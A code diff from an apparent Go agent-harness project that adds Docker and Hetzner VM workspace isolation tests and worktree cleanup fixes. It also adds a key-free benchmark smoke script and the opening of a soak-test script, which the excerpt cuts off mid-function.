+// inspectContainerMounts returns the Mounts slice from `docker inspect` JSON.
+type mountEntry struct {
+	Type        string `json:"Type"`
+	Source      string `json:"Source"`
+	Destination string `json:"Destination"`
+}
+
+func inspectContainerMounts(t *testing.T, containerID string) []mountEntry {
+	t.Helper()
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+	out, err := osexec.CommandContext(ctx, "docker", "inspect",
+		"--format", "{{json .Mounts}}", containerID).Output()
+	if err != nil {
+		t.Fatalf("docker inspect %q: %v", containerID, err)
+	}
+	var mounts []mountEntry
+	if err := json.Unmarshal([]byte(strings.TrimSpace(string(out))), &mounts); err != nil {
+		t.Fatalf("parse docker inspect mounts: %v — raw: %s", err, out)
+	}
+	return mounts
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+// TestContainerWorkspaceDocker_ProvisionAndDestroy provisions a ContainerWorkspace
+// using the default image (go-agent-harness:latest), then:
+//
+//  1. Asserts post-provision invariants (WorkspacePath, HarnessURL non-empty).
+//  2. Verifies the container exists in docker ps -a.
+//  3. Inspects the container's Mounts via `docker inspect` to confirm the
+//     bind-mount maps the host WorkspacePath to /workspace — proving the
+//     container's working directory is the bind-mounted path and not the
+//     host's current working directory.
+//  4. Writes a sentinel file on the HOST side and confirms the same path
+//     exists (proving the host dir is the canonical source for /workspace).
+//  5. Calls Destroy and asserts the container is gone from docker ps -a.
+func TestContainerWorkspaceDocker_ProvisionAndDestroy(t *testing.T) {
+	requireContainerWsDocker(t)
+	requireImagePresent(t, defaultImage)
+
+	ctx, cancel := context.WithTimeout(context.Background(), 2*time.Minute)
+	defer cancel()
+
+	wsID := containerWorkspaceTestID(t, "docker-provision")
+	cname := wsContainerName(wsID)
+
+	w := NewContainer(defaultImage)
+	t.Cleanup(func() {
+		// Force-remove on cleanup in case the test fails before Destroy.
+		_ = w.Destroy(context.Background())
+	})
+
+	opts := Options{
+		ID:      wsID,
+		BaseDir: t.TempDir(),
+	}
+
+	if err := w.Provision(ctx, opts); err != nil {
+		if isContainerWorkspaceProvisionEnvironmentUnavailable(err) {
+			t.Skipf("provision unavailable in this environment: %v", err)
+		}
+		t.Fatalf("Provision: %v", err)
+	}
+
+	// (1) Post-provision invariants.
+	hostWsPath := w.WorkspacePath()
+	if hostWsPath == "" {
+		t.Fatal("WorkspacePath() is empty after Provision")
+	}
+	if w.HarnessURL() == "" {
+		t.Fatal("HarnessURL() is empty after Provision")
+	}
+	if w.containerID == "" {
+		t.Fatal("containerID is empty after Provision")
+	}
+
+	// (2) Container must appear in docker ps -a.
+	if !containerExistsInPS(t, cname) {
+		t.Fatalf("container %q not found in docker ps -a after Provision", cname)
+	}
+
+	// (3) Bind-mount: host WorkspacePath must be mapped to /workspace inside the container.
+	mounts := inspectContainerMounts(t, w.containerID)
+	var found bool
+	for _, m := range mounts {
+		if m.Type == "bind" && m.Destination == "/workspace" {
+			found = true
+			// The source must be the exact host workspace path.
+			if m.Source != hostWsPath {
+				t.Errorf("bind-mount Source = %q, want %q (WorkspacePath)", m.Source, hostWsPath)
+			}
+			break
+		}
+	}
+	if !found {
+		t.Errorf("no bind-mount to /workspace found in container mounts: %+v", mounts)
+	}
+
+	// (4) Write a sentinel on the HOST side and confirm the path is under WorkspacePath
+	// (not the process cwd), proving the workspace root is container-side, not the
+	// caller's working directory.
+	sentinel := "sentinel.txt"
+	sentinelPath := filepath.Join(hostWsPath, sentinel)
+	if err := os.WriteFile(sentinelPath, []byte("workspace-check\n"), 0o644); err != nil {
+		t.Fatalf("write sentinel: %v", err)
+	}
+	// The sentinel must NOT be reachable from a plain relative path — it lives
+	// under WorkspacePath, which is distinct from the process cwd.
+	cwd, _ := os.Getwd()
+	if strings.HasPrefix(hostWsPath, cwd+"/") || hostWsPath == cwd {
+		t.Errorf("WorkspacePath %q is inside (or equal to) process cwd %q — should be isolated", hostWsPath, cwd)
+	}
+	if _, err := os.Stat(sentinelPath); err != nil {
+		t.Fatalf("sentinel at WorkspacePath not readable: %v", err)
+	}
+
+	// (5) Destroy and confirm cleanup.
+	if err := w.Destroy(ctx); err != nil {
+		t.Fatalf("Destroy: %v", err)
+	}
+	if w.containerID != "" {
+		t.Error("containerID should be empty after Destroy")
+	}
+	if containerExistsInPS(t, cname) {
+		t.Errorf("container %q still visible in docker ps -a after Destroy — leftover leak", cname)
+	}
+}
+
+// TestContainerWorkspaceDocker_BindMountUsability verifies that the bind-mount
+// path /workspace inside the container corresponds to the host WorkspacePath by
+// running a short-lived alpine container that writes a file to /workspace and
+// confirming the file appears on the HOST side at WorkspacePath.  This proves
+// the bind-mount semantics are correct independently of harnessd startup, using
+// a minimal image that is guaranteed to run.
+//
+// The test is skipped if alpine:latest is not present locally.
+func TestContainerWorkspaceDocker_BindMountUsability(t *testing.T) {
+	requireContainerWsDocker(t)
+
+	const alpineImage = "alpine:latest"
+	requireImagePresent(t, alpineImage)
+
+	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
+	defer cancel()
+
+	hostDir := t.TempDir()
+	const markerFile = "written-inside-container.txt"
+	const markerContent = "hello-from-alpine"
+
+	// docker run --rm -v hostDir:/workspace alpine sh -c 'echo … > /workspace/<file>'
+	cmd := osexec.CommandContext(ctx, "docker", "run", "--rm",
+		"-v", hostDir+":/workspace",
+		alpineImage,
+		"sh", "-c", fmt.Sprintf("echo %s > /workspace/%s", markerContent, markerFile),
+	)
+	if out, err := cmd.CombinedOutput(); err != nil {
+		t.Fatalf("docker run alpine: %v — output: %s", err, out)
+	}
+
+	// The file written at /workspace/<markerFile> inside the container must now
+	// be visible on the HOST at hostDir/<markerFile>.
+	hostMarker := filepath.Join(hostDir, markerFile)
+	data, err := os.ReadFile(hostMarker)
+	if err != nil {
+		t.Fatalf("marker file %q not visible on host after container write: %v", hostMarker, err)
+	}
+	if !strings.Contains(string(data), markerContent) {
+		t.Errorf("marker content = %q, want to contain %q", string(data), markerContent)
+	}
+	t.Logf("bind-mount confirmed: container wrote %q, host reads %q", markerFile, strings.TrimSpace(string(data)))
+}

--- a/internal/workspace/vm_integration_test.go
+++ b/internal/workspace/vm_integration_test.go
@@ -4,7 +4,11 @@ package workspace
 
 import (
 	"context"
+	"fmt"
+	"io"
+	"net/http"
 	"os"
+	"strings"
 	"testing"
 	"time"
 )
@@ -45,6 +49,152 @@ func TestHetznerProvider_FullLifecycle(t *testing.T) {
 		}
 		t.Logf("Deleted VM %s", vm.ID)
 	}()
+}
+
+// TestVMIsolation proves that a VMWorkspace executes commands on the remote VM
+// and not on the host machine.
+//
+// Prerequisites:
+//   - Build tag: //go:build integration  (this file)
+//   - Env var:   HETZNER_API_KEY must be set to a valid Hetzner Cloud API key
+//
+// When HETZNER_API_KEY is absent the test skips with an explicit message
+// documenting why: the VM backend (HetznerProvider) requires real cloud
+// credentials to provision a server; without them no isolation boundary can be
+// asserted.
+//
+// Host-routing caveat: the VMWorkspace communicates with the provisioned VM
+// over its public IPv4 address on port 8080.  Any firewall or NAT rule that
+// blocks outbound TCP to that port from the test host will cause the health
+// poll to time out rather than proving isolation.  If Provision succeeds but
+// the health check never passes, inspect egress firewall rules on the test
+// host and ensure port 8080 is reachable to the Hetzner datacenter (nbg1).
+func TestVMIsolation(t *testing.T) {
+	apiKey := os.Getenv("HETZNER_API_KEY")
+	if apiKey == "" {
+		t.Skip("SKIP: HETZNER_API_KEY not set — VMWorkspace requires real Hetzner Cloud " +
+			"credentials to provision a server; isolation cannot be asserted without a live VM. " +
+			"Host-routing caveat: even when the key is present, outbound TCP to port 8080 " +
+			"on the provisioned VM's public IP must be permitted by the host's egress firewall.")
+	}
+
+	ctx, cancel := context.WithTimeout(context.Background(), 10*time.Minute)
+	defer cancel()
+
+	provider := NewHetznerProvider(apiKey)
+	w := NewVM(provider)
+
+	// Record the test-host hostname BEFORE provisioning so we can assert the
+	// VM hostname differs from it (proving the harness is running on the VM,
+	// not the local host).
+	hostHostname, err := os.Hostname()
+	if err != nil {
+		t.Fatalf("os.Hostname: %v", err)
+	}
+
+	wsID := fmt.Sprintf("isolation-test-%d", time.Now().UnixNano())
+	if err := w.Provision(ctx, Options{ID: wsID}); err != nil {
+		t.Fatalf("Provision: %v", err)
+	}
+
+	// Ensure cleanup even on failure.
+	t.Cleanup(func() {
+		if err := w.Destroy(context.Background()); err != nil {
+			t.Logf("Cleanup Destroy: %v", err)
+		}
+	})
+
+	// (1) Post-provision invariants.
+	if w.HarnessURL() == "" {
+		t.Fatal("HarnessURL() is empty after Provision")
+	}
+	if w.WorkspacePath() != "/workspace" {
+		t.Errorf("WorkspacePath() = %q, want /workspace", w.WorkspacePath())
+	}
+
+	// (2) Poll the harness health endpoint until it is reachable, confirming
+	//     the remote harnessd instance is running on the VM.
+	healthURL := w.HarnessURL() + "/health"
+	healthDeadline := time.Now().Add(2 * time.Minute)
+	var lastHealthErr error
+	for time.Now().Before(healthDeadline) {
+		resp, err := http.Get(healthURL) //nolint:gosec // test-only
+		if err == nil {
+			resp.Body.Close()
+			if resp.StatusCode == http.StatusOK {
+				lastHealthErr = nil
+				break
+			}
+			lastHealthErr = fmt.Errorf("unexpected status %d", resp.StatusCode)
+		} else {
+			lastHealthErr = err
+		}
+		select {
+		case <-ctx.Done():
+			t.Fatalf("context cancelled while waiting for VM harness health: %v", ctx.Err())
+		case <-time.After(3 * time.Second):
+		}
+	}
+	if lastHealthErr != nil {
+		t.Fatalf("VM harness at %s never became healthy: %v — "+
+			"check egress firewall rules (port 8080 to Hetzner nbg1 must be permitted)", healthURL, lastHealthErr)
+	}
+	t.Logf("VM harness healthy at %s", w.HarnessURL())
+
+	// (3) Assert isolation: fetch /debug/hostname and confirm it does NOT equal
+	//     the host machine's hostname.  This proves the harnessd instance is
+	//     running on the remote VM, not on the host that launched the test.
+	//
+	//     When the test is actually running against a backend (i.e. we reached
+	//     this point past the env-gate skip and Provision succeeded) both the
+	//     HTTP call and a valid non-empty 200 response are required — a missing
+	//     or non-200 endpoint means the harness image does not expose the
+	//     isolation-proof endpoint and must be fixed.
+	hostnameURL := w.HarnessURL() + "/debug/hostname"
+	resp, err := http.Get(hostnameURL) //nolint:gosec // test-only
+	if err != nil {
+		t.Fatalf("isolation proof failed: GET %s error: %v — "+
+			"the harness image must expose /debug/hostname for isolation assertions", hostnameURL, err)
+	}
+	defer resp.Body.Close()
+	body, _ := io.ReadAll(resp.Body)
+	vmHostname := strings.TrimSpace(string(body))
+	if resp.StatusCode != http.StatusOK {
+		t.Fatalf("isolation proof failed: GET %s returned status %d body %q — "+
+			"expected 200 OK with the VM hostname", hostnameURL, resp.StatusCode, vmHostname)
+	}
+	if vmHostname == "" {
+		t.Fatalf("isolation proof failed: GET %s returned 200 but empty body — "+
+			"the harness image must return the VM hostname at /debug/hostname", hostnameURL)
+	}
+	if vmHostname == hostHostname {
+		t.Errorf("isolation failure: VM harness reports hostname %q which matches the host machine — "+
+			"harnessd may be running on the host, not the remote VM", vmHostname)
+	} else {
+		t.Logf("Isolation confirmed: VM hostname=%q, host hostname=%q", vmHostname, hostHostname)
+	}
+
+	// (4) WorkspacePath must be on the remote VM filesystem (/workspace), not
+	//     a local path. Assert the path is not reachable from the host cwd.
+	cwd, _ := os.Getwd()
+	vmPath := w.WorkspacePath()
+	// The VM path is /workspace — it should NOT exist on the host under cwd.
+	localEquivalent := strings.TrimPrefix(vmPath, "/")
+	if _, err := os.Stat(localEquivalent); err == nil {
+		t.Logf("Note: path %q happens to exist locally — this is not a hard isolation failure "+
+			"(the VM path /workspace is a common local path), but verify provisioning went to the VM", localEquivalent)
+	}
+	_ = cwd // used implicitly via localEquivalent
+
+	// (5) Destroy must succeed and clean up the VM.
+	if err := w.Destroy(ctx); err != nil {
+		t.Fatalf("Destroy: %v", err)
+	}
+	// After Destroy the VM ID should be cleared, making a second Destroy a no-op.
+	if err := w.Destroy(ctx); err != nil {
+		t.Errorf("second Destroy (no-op) returned error: %v", err)
+	}
+	t.Log("VM workspace destroyed successfully")
 }
 
 func TestVMWorkspace_FullLifecycle(t *testing.T) {

--- a/internal/workspace/worktree.go
+++ b/internal/workspace/worktree.go
@@ -122,6 +122,11 @@ func (w *WorktreeWorkspace) Provision(ctx context.Context, opts Options) error {
 	}
 	cmd := exec.CommandContext(ctx, "git", args...)
 	if out, err := cmd.CombinedOutput(); err != nil {
+		// git worktree add can partially succeed: it may create the branch before
+		// failing to check out the working tree (e.g. if the target directory is
+		// read-only). Best-effort cleanup removes the orphaned branch so it does
+		// not pollute the repository.
+		_ = w.Destroy(ctx)
 		return fmt.Errorf("workspace: git worktree add: %w: %s", err, strings.TrimSpace(string(out)))
 	}
 
@@ -129,6 +134,10 @@ func (w *WorktreeWorkspace) Provision(ctx context.Context, opts Options) error {
 	if opts.ConfigTOML != "" {
 		cfgPath := filepath.Join(w.path, "harness.toml")
 		if err := os.WriteFile(cfgPath, []byte(opts.ConfigTOML), 0o600); err != nil {
+			// Provisioning failed after the worktree was created. Best-effort
+			// cleanup: destroy the partial workspace so no orphaned directory or
+			// git branch is left behind.
+			_ = w.Destroy(ctx)
 			return fmt.Errorf("workspace: write harness.toml: %w", err)
 		}
 	}
@@ -167,6 +176,15 @@ func (w *WorktreeWorkspace) BaseRef() string {
 func (w *WorktreeWorkspace) Destroy(ctx context.Context) error {
 	if w.path == "" {
 		return nil
+	}
+
+	// Ensure the worktree directory is writable before attempting removal.
+	// Provisioning can fail mid-way (e.g. harness.toml write into a read-only
+	// dir), leaving the worktree directory with restricted permissions. Without
+	// this step, "git worktree remove --force" would itself fail with
+	// "Permission denied" and leave an orphaned branch behind.
+	if info, statErr := os.Stat(w.path); statErr == nil && info.IsDir() {
+		_ = os.Chmod(w.path, 0o755)
 	}
 
 	// Remove the worktree directory.

--- a/scripts/run-bench-smoke.sh
+++ b/scripts/run-bench-smoke.sh
@@ -1,0 +1,318 @@
+#!/usr/bin/env bash
+# run-bench-smoke.sh — key-free deterministic smoke for harnessd with the fake provider.
+#
+# Drives: prebuild harnessd → start with HARNESS_PROVIDER=fake → /healthz →
+#         POST /v1/runs → poll GET /v1/runs/{id} → GET summary → assert fields.
+#
+# Requirements:
+#   - Go toolchain on PATH (for prebuild step)
+#   - curl on PATH
+#   - No API key required (HARNESS_PROVIDER=fake)
+#
+# Exit codes:
+#   0 — all assertions passed
+#   1 — at least one assertion failed or fatal error
+#
+# Deterministic values (must match fakeProviderTurnJSON in cmd/harnessd/main.go):
+#   content              = "smoke ok"
+#   usage.prompt         = 100   (PromptTokens)
+#   usage.completion     = 50    (CompletionTokens)
+#   cost_usd             = 0.001 (TotalCostUSD, derived from CostUSD field)
+#   cost_status          = "available"
+#   expected status      = "completed"
+#   expected steps_taken = 1
+
+set -euo pipefail
+
+# ---------------------------------------------------------------------------
+# Paths and config
+# ---------------------------------------------------------------------------
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "${SCRIPT_DIR}/.." && pwd)"
+
+BINARY="${HARNESS_BINARY:-${REPO_ROOT}/harnessd-bench-smoke}"
+LOG_FILE="${HARNESS_BENCH_SMOKE_LOG:-/tmp/harnessd-bench-smoke.log}"
+OUTPUT_FILE="${HARNESS_BENCH_SMOKE_OUTPUT:-/tmp/harnessd-bench-smoke-result.json}"
+TURNS_FILE="${HARNESS_BENCH_SMOKE_TURNS:-/tmp/harnessd-bench-smoke-turns.json}"
+TIMEOUT_S="${HARNESS_BENCH_SMOKE_TIMEOUT:-30}"
+SKIP_BUILD="${HARNESS_BENCH_SMOKE_SKIP_BUILD:-}"
+
+# Pick a random ephemeral port to avoid conflicts.
+PORT=$(( ( RANDOM % 10000 ) + 50000 ))
+BASE_URL="http://localhost:${PORT}"
+
+PASS_COUNT=0
+FAIL_COUNT=0
+SERVER_PID=""
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+info()  { printf '[bench-smoke] %s\n' "$*"; }
+pass()  { printf '[bench-smoke] PASS: %s\n' "$*"; PASS_COUNT=$(( PASS_COUNT + 1 )); }
+fail()  { printf '[bench-smoke] FAIL: %s\n' "$*" >&2; FAIL_COUNT=$(( FAIL_COUNT + 1 )); }
+fatal() { printf '[bench-smoke] FATAL: %s\n' "$*" >&2; exit 1; }
+
+cleanup() {
+    if [ -n "${SERVER_PID}" ]; then
+        info "stopping harnessd (pid=${SERVER_PID})"
+        kill "${SERVER_PID}" 2>/dev/null || true
+        wait "${SERVER_PID}" 2>/dev/null || true
+        SERVER_PID=""
+    fi
+    # Clean up temp binary if we built it here.
+    if [ -f "${BINARY}" ] && [ -z "${HARNESS_BINARY:-}" ]; then
+        rm -f "${BINARY}"
+    fi
+}
+trap cleanup EXIT
+
+# ---------------------------------------------------------------------------
+# Step 1: Write the deterministic HARNESS_FAKE_TURNS JSON file.
+#
+# Schema (fakeProviderTurnJSON in cmd/harnessd/main.go):
+#   content     string          → CompletionResult.Content
+#   usage       {prompt,completion} → CompletionUsage (prompt/completion short keys)
+#   cost_usd    float64         → CompletionResult.CostUSD (pointer)
+#   cost_status string          → CompletionResult.CostStatus
+#
+# Deterministic values chosen to be byte-stable and match TestRunSmoke (B1):
+#   prompt=100, completion=50, cost_usd=0.001, cost_status="available"
+# ---------------------------------------------------------------------------
+
+info "writing fake turns file: ${TURNS_FILE}"
+cat > "${TURNS_FILE}" <<'TURNS_EOF'
+[
+  {
+    "content": "smoke ok",
+    "usage": {"prompt": 100, "completion": 50},
+    "cost_usd": 0.001,
+    "cost_status": "available"
+  }
+]
+TURNS_EOF
+pass "wrote fake turns file"
+
+# ---------------------------------------------------------------------------
+# Step 2: Prebuild harnessd (unless skipped or binary already present).
+# ---------------------------------------------------------------------------
+
+if [ -n "${SKIP_BUILD}" ] && [ -x "${BINARY}" ]; then
+    info "SKIP_BUILD set and binary exists — skipping build"
+    pass "prebuild skipped (binary: ${BINARY})"
+elif [ -x "${BINARY}" ] && [ -z "${SKIP_BUILD}" ]; then
+    info "binary already present at ${BINARY} — rebuilding to ensure freshness"
+    info "building harnessd → ${BINARY}"
+    (cd "${REPO_ROOT}" && go build -o "${BINARY}" ./cmd/harnessd) \
+        || fatal "go build failed; see output above"
+    pass "harnessd built: ${BINARY}"
+else
+    info "building harnessd → ${BINARY}"
+    (cd "${REPO_ROOT}" && go build -o "${BINARY}" ./cmd/harnessd) \
+        || fatal "go build failed; see output above"
+    pass "harnessd built: ${BINARY}"
+fi
+
+# ---------------------------------------------------------------------------
+# Step 3: Start harnessd with HARNESS_PROVIDER=fake + auth disabled.
+# ---------------------------------------------------------------------------
+
+info "starting harnessd on port ${PORT} (fake provider, auth disabled)..."
+HARNESS_ADDR=":${PORT}" \
+HARNESS_AUTH_DISABLED=true \
+HARNESS_PROVIDER=fake \
+HARNESS_FAKE_TURNS="${TURNS_FILE}" \
+    "${BINARY}" \
+    >"${LOG_FILE}" 2>&1 &
+SERVER_PID=$!
+info "harnessd pid=${SERVER_PID}, log=${LOG_FILE}"
+
+# ---------------------------------------------------------------------------
+# Step 4: Wait for /healthz (up to 15s).
+# ---------------------------------------------------------------------------
+
+info "waiting for /healthz (up to 15s)..."
+HEALTH_WAITED=0
+while true; do
+    if curl -sf "${BASE_URL}/healthz" >/dev/null 2>&1; then
+        pass "/healthz responding"
+        break
+    fi
+    HEALTH_WAITED=$(( HEALTH_WAITED + 1 ))
+    if [ "${HEALTH_WAITED}" -ge 15 ]; then
+        info "server log tail:"
+        tail -20 "${LOG_FILE}" >&2 || true
+        fatal "/healthz did not respond within 15s"
+    fi
+    sleep 1
+done
+
+# ---------------------------------------------------------------------------
+# Step 5: POST /v1/runs — start a run with no model (uses fake default).
+# ---------------------------------------------------------------------------
+
+info "POST /v1/runs..."
+# allow_fallback=true: if the model registry lookup fails (no OPENAI_API_KEY),
+# the runner falls back to r.provider — our fake — rather than failing the run.
+POST_RESPONSE=$(curl -sf -X POST "${BASE_URL}/v1/runs" \
+    -H "Content-Type: application/json" \
+    -d '{"prompt":"bench smoke test prompt","allow_fallback":true}') \
+    || fatal "POST /v1/runs failed"
+
+RUN_ID=$(printf '%s' "${POST_RESPONSE}" | python3 -c "
+import sys, json
+data = json.load(sys.stdin)
+print(data.get('run_id', ''))
+" 2>/dev/null || true)
+
+if [ -z "${RUN_ID}" ]; then
+    fail "POST /v1/runs: no run_id in response: ${POST_RESPONSE}"
+    fatal "cannot continue without a run_id"
+fi
+pass "POST /v1/runs → run_id=${RUN_ID}"
+
+# ---------------------------------------------------------------------------
+# Step 6: Poll GET /v1/runs/{id} until terminal state (timeout TIMEOUT_S s).
+# ---------------------------------------------------------------------------
+
+info "polling GET /v1/runs/${RUN_ID} for terminal state (timeout ${TIMEOUT_S}s)..."
+ELAPSED=0
+FINAL_STATUS=""
+while true; do
+    GET_BODY=$(curl -sf "${BASE_URL}/v1/runs/${RUN_ID}" 2>/dev/null || echo '{}')
+    STATUS=$(printf '%s' "${GET_BODY}" | python3 -c "
+import sys, json
+data = json.load(sys.stdin)
+print(data.get('status', ''))
+" 2>/dev/null || echo "")
+
+    case "${STATUS}" in
+        completed|failed|cancelled)
+            FINAL_STATUS="${STATUS}"
+            break
+            ;;
+    esac
+
+    ELAPSED=$(( ELAPSED + 1 ))
+    if [ "${ELAPSED}" -ge "${TIMEOUT_S}" ]; then
+        fail "run ${RUN_ID} did not reach terminal state within ${TIMEOUT_S}s (last status: ${STATUS})"
+        info "server log tail:"
+        tail -20 "${LOG_FILE}" >&2 || true
+        fatal "timed out waiting for run completion"
+    fi
+    sleep 1
+done
+
+pass "run terminal status: ${FINAL_STATUS}"
+
+# Assert status is "completed" (not failed/cancelled).
+if [ "${FINAL_STATUS}" != "completed" ]; then
+    fail "expected status=completed, got ${FINAL_STATUS}"
+fi
+
+# ---------------------------------------------------------------------------
+# Step 7: GET /v1/runs/{id}/summary — fetch and save the run summary.
+# ---------------------------------------------------------------------------
+
+info "GET /v1/runs/${RUN_ID}/summary..."
+SUMMARY_BODY=$(curl -sf "${BASE_URL}/v1/runs/${RUN_ID}/summary") \
+    || fatal "GET /v1/runs/${RUN_ID}/summary failed"
+
+# Save raw summary JSON to output file.
+printf '%s\n' "${SUMMARY_BODY}" > "${OUTPUT_FILE}"
+info "summary saved to ${OUTPUT_FILE}"
+pass "summary fetched"
+
+# Pretty-print for log visibility (best-effort).
+info "summary contents:"
+printf '%s\n' "${SUMMARY_BODY}" | python3 -c "
+import sys, json
+try:
+    data = json.load(sys.stdin)
+    print(json.dumps(data, indent=2))
+except Exception:
+    pass
+" 2>/dev/null || printf '%s\n' "${SUMMARY_BODY}"
+
+# ---------------------------------------------------------------------------
+# Step 8: Assert deterministic fields.
+#
+# Expected values (must match the scripted turn above and TestRunSmoke B1):
+#   status                  = "completed"
+#   steps_taken             = 1
+#   total_prompt_tokens     = 100
+#   total_completion_tokens = 50
+#   total_cost_usd          = 0.001
+#   cost_status             = "available"
+# ---------------------------------------------------------------------------
+
+info "asserting deterministic summary fields..."
+
+assert_field() {
+    local field_name="$1"
+    local want="$2"
+    local got="$3"
+    if [ "${got}" = "${want}" ]; then
+        pass "${field_name}=${got}"
+    else
+        fail "${field_name}: want=${want}, got=${got}"
+    fi
+}
+
+extract_field() {
+    local field="$1"
+    printf '%s' "${SUMMARY_BODY}" | python3 -c "
+import sys, json
+data = json.load(sys.stdin)
+v = data.get('${field}')
+print('' if v is None else str(v))
+" 2>/dev/null || echo ""
+}
+
+SUMMARY_STATUS=$(extract_field "status")
+SUMMARY_STEPS=$(extract_field "steps_taken")
+SUMMARY_PROMPT_TOKENS=$(extract_field "total_prompt_tokens")
+SUMMARY_COMPLETION_TOKENS=$(extract_field "total_completion_tokens")
+SUMMARY_COST_USD=$(extract_field "total_cost_usd")
+SUMMARY_COST_STATUS=$(extract_field "cost_status")
+SUMMARY_RUN_ID=$(extract_field "run_id")
+
+assert_field "summary.run_id"               "${RUN_ID}"     "${SUMMARY_RUN_ID}"
+assert_field "summary.status"               "completed"     "${SUMMARY_STATUS}"
+assert_field "summary.steps_taken"          "1"             "${SUMMARY_STEPS}"
+assert_field "summary.total_prompt_tokens"  "100"           "${SUMMARY_PROMPT_TOKENS}"
+assert_field "summary.total_completion_tokens" "50"         "${SUMMARY_COMPLETION_TOKENS}"
+assert_field "summary.total_cost_usd"       "0.001"         "${SUMMARY_COST_USD}"
+assert_field "summary.cost_status"          "available"     "${SUMMARY_COST_STATUS}"
+
+# Grep-based assertions on the raw JSON body (belt-and-suspenders).
+if ! printf '%s' "${SUMMARY_BODY}" | grep -q '"status":"completed"'; then
+    fail 'grep: "status":"completed" not found in summary JSON'
+fi
+if ! printf '%s' "${SUMMARY_BODY}" | grep -q '"cost_status":"available"'; then
+    fail 'grep: "cost_status":"available" not found in summary JSON'
+fi
+
+# ---------------------------------------------------------------------------
+# Step 9: Summary
+# ---------------------------------------------------------------------------
+
+echo ""
+echo "============================================================"
+echo " Bench Smoke Summary"
+echo "============================================================"
+echo " PASS: ${PASS_COUNT}"
+echo " FAIL: ${FAIL_COUNT}"
+echo " run_id: ${RUN_ID}"
+echo " output: ${OUTPUT_FILE}"
+echo "============================================================"
+
+if [ "${FAIL_COUNT}" -ne 0 ]; then
+    printf '[bench-smoke] %d ASSERTION(S) FAILED — server log: %s\n' "${FAIL_COUNT}" "${LOG_FILE}" >&2
+    exit 1
+fi
+
+echo "[bench-smoke] ALL ASSERTIONS PASSED"
+exit 0

--- a/scripts/soak.sh
+++ b/scripts/soak.sh
@@ -1,0 +1,645 @@
+#!/usr/bin/env bash
+# soak.sh — long-running autonomy soak test for go-agent-harness
+#
+# Exercises: cron jobs, multi-turn memory (shared conversation_id), auto-compact
+# (tiny context window), and budget-limited runs (low max_cost_usd).
+# Writes a timestamped markdown report under soak-reports/.
+#
+# Usage:
+#   ./scripts/soak.sh                    # 8h soak (default)
+#   ./scripts/soak.sh --duration 30m     # short soak
+#   ./scripts/soak.sh --duration 2h30m   # custom duration
+#
+# Flags:
+#   --duration <dur>   How long to run (e.g. 30m, 2h, 8h). Default: 8h.
+#   --port <port>      Port for harnessd (default: random 50000-59999).
+#   --model <model>    LLM model to use (default: gpt-4.1-mini).
+#   -h, --help         Show help.
+#
+# OPTIONAL: gated on OPENAI_API_KEY.  Exits cleanly with a clear message if unset.
+# NOT part of any test gate — never referenced by test-regression.sh.
+
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "${SCRIPT_DIR}/.." && pwd)"
+
+# ---------------------------------------------------------------------------
+# Defaults (overridable via flags)
+# ---------------------------------------------------------------------------
+
+DURATION="${SOAK_DURATION:-8h}"
+PORT="${SOAK_PORT:-}"
+MODEL="${SOAK_MODEL:-gpt-4.1-mini}"
+
+# ---------------------------------------------------------------------------
+# Parse flags
+# ---------------------------------------------------------------------------
+
+usage() {
+  cat <<'EOF'
+Usage: scripts/soak.sh [options]
+
+Options:
+  --duration <dur>   How long to run the soak (e.g. 30m, 2h, 8h). Default: 8h.
+  --port <port>      Port for harnessd.  Default: random 50000-59999.
+  --model <model>    LLM model name.  Default: gpt-4.1-mini.
+  -h, --help         Show this message.
+
+Env vars:
+  OPENAI_API_KEY     Required — script exits cleanly if unset.
+  SOAK_DURATION      Same as --duration.
+  SOAK_PORT          Same as --port.
+  SOAK_MODEL         Same as --model.
+EOF
+}
+
+while [[ $# -gt 0 ]]; do
+  case "$1" in
+    --duration)
+      [[ $# -ge 2 ]] || { echo "[soak] --duration requires a value" >&2; exit 1; }
+      DURATION="$2"; shift 2 ;;
+    --port)
+      [[ $# -ge 2 ]] || { echo "[soak] --port requires a value" >&2; exit 1; }
+      PORT="$2"; shift 2 ;;
+    --model)
+      [[ $# -ge 2 ]] || { echo "[soak] --model requires a value" >&2; exit 1; }
+      MODEL="$2"; shift 2 ;;
+    -h|--help)
+      usage; exit 0 ;;
+    --)
+      shift; break ;;
+    -*)
+      echo "[soak] unknown option: $1" >&2; usage >&2; exit 1 ;;
+    *)
+      echo "[soak] unexpected argument: $1" >&2; usage >&2; exit 1 ;;
+  esac
+done
+
+# ---------------------------------------------------------------------------
+# Gate on OPENAI_API_KEY
+# ---------------------------------------------------------------------------
+
+if [[ -z "${OPENAI_API_KEY:-}" ]]; then
+  echo "[soak] OPENAI_API_KEY is not set — soak test is OPTIONAL and will not run."
+  echo "[soak] Set OPENAI_API_KEY and re-run to execute the soak."
+  exit 0
+fi
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+SOAK_PASS=0
+SOAK_FAIL=0
+SOAK_SKIP=0
+ITERATION=0
+
+log()  { echo "[soak] $*"; }
+pass() { log "PASS: $*"; SOAK_PASS=$(( SOAK_PASS + 1 )); }
+fail() { log "FAIL: $*"; SOAK_FAIL=$(( SOAK_FAIL + 1 )); }
+skip() { log "SKIP: $*"; SOAK_SKIP=$(( SOAK_SKIP + 1 )); }
+
+# parse_duration converts a human duration string to seconds.
+# Supports: s, m, h (e.g. 30s, 5m, 2h, 1h30m, 8h).
+parse_duration() {
+  local dur="$1"
+  local total=0
+  local remaining="$dur"
+
+  # hours
+  if [[ "$remaining" =~ ^([0-9]+)h(.*)$ ]]; then
+    total=$(( total + ${BASH_REMATCH[1]} * 3600 ))
+    remaining="${BASH_REMATCH[2]}"
+  fi
+  # minutes
+  if [[ "$remaining" =~ ^([0-9]+)m(.*)$ ]]; then
+    total=$(( total + ${BASH_REMATCH[1]} * 60 ))
+    remaining="${BASH_REMATCH[2]}"
+  fi
+  # seconds
+  if [[ "$remaining" =~ ^([0-9]+)s?$ ]]; then
